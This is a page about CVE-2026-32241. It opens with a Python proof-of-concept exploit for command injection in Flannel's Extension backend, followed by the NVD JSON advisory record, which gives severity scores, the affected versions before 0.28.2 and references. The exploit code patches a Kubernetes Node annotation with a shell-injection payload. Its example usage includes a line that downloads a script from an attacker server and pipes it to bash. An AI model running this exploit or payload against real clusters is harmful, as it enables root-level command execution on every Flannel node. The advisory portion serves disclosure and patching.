CVE-2026-32241

# PoC to demonstrate command injection in Flannel Extension backend # Attacker needs permission to patch Node objects in Kubernetes from kubernetes import client, config def exploit_flannel_rce(node_name, malicious_command): # Load kubeconfig config.load_kube_config() api_instance = client.CoreV1Api() # The vulnerable annotation key annotation_key = "flannel.alpha.coreos.com/backend-data" # Payload construction: The data is unmarshalled and piped to shell. # This payload attempts to inject a command separator and the malicious command. # The exact JSON structure may vary based on Flannel config, but the input flows to stdin. payload = f'; {malicious_command} #' body = { "metadata": { "annotations": { annotation_key: payload } } } try: # Patch the node to trigger the vulnerability api_instance.patch_node(node_name, body) print(f"[+] Successfully patched node {node_name} with payload.") print(f"[+] Attempting to execute: {malicious_command}") except Exception as e: print(f"[-] Error: {e}") # Example usage: # exploit_flannel_rce("target-node-name", "curl http://attacker-server/shell.sh | bash") # exploit_flannel_rce("target-node-name", "touch /tmp/pwned")

{"cve": {"id": "CVE-2026-32241", "sourceIdentifier": "[email protected]", "published": "2026-03-27T20:16:30.570", "lastModified": "2026-04-08T15:29:13.030", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Flannel is a network fabric for containers, designed for Kubernetes. The Flannel project includes an experimental Extension backend that allows users to easily prototype new backend types. In versions of Flannel prior to 0.28.2, this Extension backend is vulnerable to a command injection that allows an attacker who can set Kubernetes Node annotations to achieve root-level arbitrary command execution on every flannel node in the cluster. The Extension backend's SubnetAddCommand and SubnetRemoveCommand receive attacker-controlled data via stdin (from the `flannel.alpha.coreos.com/backend-data` Node annotation). The content of this annotation is unmarshalled and piped directly to a shell command without checks. Kubernetes clusters using Flannel with the Extension backend are affected by this vulnerability. Other backends such as vxlan and wireguard are unaffected. The vulnerability is fixed in version v0.28.2. As a workaround, use Flannel with another backend such as vxlan or wireguard."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.6, "impactScore": 5.9}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-77"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:flannel-io:flannel:*:*:*:*:*:kubernetes:*:*", "versionEndExcluding": "0.28.2", "matchCriteriaId": "8670D1E4-2A5B-42ED-94C1-F8AFCD308809"}]}]}], "references": [{"url": "https://github.com/flannel-io/flannel/releases/tag/v0.28.2", "source": "[email protected]", "tags": ["Product", "Release Notes"]}, {"url": "https://github.com/flannel-io/flannel/security/advisories/GHSA-vchx-5pr6-ffx2", "source": "[email protected]", "tags": ["Mitigation", "Vendor Advisory"]}]}}